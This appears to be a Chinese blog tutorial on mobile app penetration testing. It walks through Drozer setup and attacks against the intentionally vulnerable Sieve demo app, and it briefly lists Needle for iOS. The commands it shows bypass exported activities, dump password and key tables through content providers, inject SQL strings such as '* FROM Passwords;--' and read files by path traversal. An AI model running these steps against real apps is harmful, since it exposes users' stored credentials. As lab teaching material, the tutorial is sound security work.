IOS-Android漏洞挖掘(一)

状态: 需补充

0x00 前言

越来越多的业务只有app端了,搞hs的,搞bc的,对于APP渗透的思路原本只有翻看反编译源码,绕过抓包限制获取流量包进行修改,慢慢的app也随之升级了,所有数据经过时间戳或key,统一加密解密传输了。 通过一些工具或框架,可自动化发现一些硬编译的key和漏洞,也可在数据被加密前进行修改。

0x01 来自 F-secure Labs的工具Drozer(Android)

F-secure Labs还有一个著名的工具叫C3,比C2多一C

Drozer项目地址:https://labs.f-secure.com/tools/drozer/

https://github.com/FSecureLABS/drozer/tree/master

安装环境

Python2.7
注意:在Windows上,请确保将Python安装路径和Python安装下的脚本文件夹添加到PATH环境变量中。
Protobuf 2.6 或更高版本
Pyopenssl 16.2 或更高版本
Twisted 10.2 或更高版本
Java开发工具包1.7
注意:在Windows上,请确保将javac.exe的路径添加到PATH环境变量中。
Android debug bridge

环境初始化

  1. 安装模拟器与adb

    推荐雷电模拟器,可以在虚拟机中运行

  2. 安装python2.7和drozer msi文件

    https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4.win32.msi

    https://www.python.org/ftp/python/2.7.18/python-2.7.18.amd64.msi

    python -m pip install pyOpenSSL
    python -m pip install protobuf==2.4.1
    python -m pip install twisted
    
  3. 下载drozer代理apk和一个密码管理器app用作测试示例

    https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk

    https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

  4. adb安装

    adb install drozer-agent-2.3.4.apk
    adb install sieve.apk
    

    Untitled

  5. 打开app开启server及端口

    Untitled

  6. adb转发端口并连接

    adb forward tcp:31415 tcp:31415
    drozer console connect
    C:\Python27\Scripts\drozer
    

    Untitled

  7. 示例app初始设置

    启动时设置16位字符管理密码

    pass:abcdefghijklmnop
    pin:2411
    
  8. 至此设置完成,开始利用drozer实践

示例测试

  1. 获取包-查看信息-确定攻击面

    dz> run app.package.list -f media 获取包
    com.android.providers.media (濯掍綋瀛樺偍)
    dz> run app.package.list -f sieve 获取包
    com.mwr.example.sieve (Sieve)
    dz> run app.package.info -a com.mwr.example.sieve 查看信息
    Package: com.mwr.example.sieve
      Application Label: Sieve
      Process Name: com.mwr.example.sieve
      Version: 1.0
      Data Directory: /data/data/com.mwr.example.sieve
      APK Path: /data/app/com.mwr.example.sieve-1/base.apk
      UID: 10028
      GID: [1028, 1015, 3003]
      Shared Libraries: null
      Shared User ID: null
      Uses Permissions:
      - android.permission.READ_EXTERNAL_STORAGE
      - android.permission.WRITE_EXTERNAL_STORAGE
      - android.permission.INTERNET
      Defines Permissions:
      - com.mwr.example.sieve.READ_KEYS
      - com.mwr.example.sieve.WRITE_KEYS
    
    dz> run app.package.attacksurface com.mwr.example.sieve 确定攻击面
    Attack Surface:
      3 activities exported
      0 broadcast receivers exported
      2 content providers exported
      2 services exported
        is debuggable
    dz>
    
  2. 查看对外的组件信息

    run app.activity.info -a com.mwr.example.sieve
    

    Untitled

  3. 越权漏洞

    run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
    

    Untitled

    Untitled

  4. 信息泄露扫描

    run scanner.provider.finduris -a com.mwr.example.sieve
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
    

    Untitled

    Untitled

  5. 注入,密码查询处

    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Passwords;--"
    

    Untitled

  6. app数据库相关操作

    run scanner.provider.injection -a  com.mwr.example.sieve 扫描注入点
    run scanner.provider.sqltables -a  com.mwr.example.sieve 列出该app的表信息
    

    Untitled

  7. 文件相关

    run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data 文件下载
    run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 文件读取
    run scanner.provider.traversal -a com.mwr.example.sieve 目录遍历漏洞测试
    

    Untitled

0x02 来自 F-secure Labs的工具Needle(IOS)

Needle项目地址:https://labs.f-secure.com/tools/needle/

https://github.com/FSecureLABS/needle-agent

框架目前没人维护,最后一次更新是在2018年

Scrounger

https://www.freebuf.com/sectool/182888.html

comments powered by Disqus